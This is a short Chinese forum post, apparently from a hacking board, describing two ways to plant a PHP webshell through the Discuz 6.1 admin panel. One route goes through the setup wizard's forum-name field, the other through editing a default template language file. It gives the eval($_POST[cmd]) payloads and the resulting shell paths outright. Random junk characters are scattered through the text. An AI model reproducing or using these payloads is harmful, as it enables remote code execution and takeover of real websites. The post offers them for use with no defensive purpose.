discuz6.1两种方法后台拿shell$ |5 g! \& ]3 h# q9 L/ O" \+ m7 K
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下6 @4 f/ O$ K. V
1:. Z3 U5 v& `# \& F' f, z+ z" F, h- f
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
3 n2 H: T0 r$ P( s7 Ladmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
1 Y" d, \9 y" y! ~* `0 y<?php eval($_POST[cmd]);?>, q p5 q7 o8 x$ N3 d$ Z+ {
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
% c0 E* f8 s2 f: ?* q; x) {* q- a$ S4 }5 \: ]
" }) v: Q1 {. i2:后台模板管理--默认模板套系--详情
. E4 N9 M0 Z) I5 Ltemplates/default/actions.lang.php. L" n5 l7 o% y. F P
jhackj\\');eval($_POST[cmd])?>;//
J5 k+ l: t/ p0 B/ y% t0 v0 Q2 o: h5 [
利用很简单,聪明的人一看就懂了 |